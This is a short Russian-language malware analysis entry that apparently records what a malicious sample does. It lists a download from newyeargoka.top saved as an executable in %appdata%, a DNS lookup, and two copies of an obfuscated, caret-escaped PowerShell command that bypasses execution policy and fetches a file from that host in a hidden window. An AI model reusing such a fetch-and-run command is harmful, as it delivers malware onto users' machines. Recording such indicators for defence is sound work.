Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^wers^He^l^L.eXe -eXecutIO^n^Po^LICY ^BYpA^SS -N^o^PR^o^fILE^ ^-^W^iNd^OwS^tY^LE^ hiddEn ^(n^ew^-^ObjecT ^syS^teM.^n^ET^.^w^EBc^LiENT).dO^W^nLo^a^DFi^LE(^'http://newyeargoka.top/r...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "p^O^wers^He^l^L.eXe -eXecutIO^n^Po^LICY ^BYpA^SS -N^o^PR^o^fILE^ ^-^W^iNd^OwS^tY^LE^ hiddEn ^(n^ew^-^ObjecT ^syS^teM.^n^ET^.^w^EBc^LiENT).dO^W^nLo^a^DFi^LE(^'http://newyeargoka.top/r...' (со скрытым окном)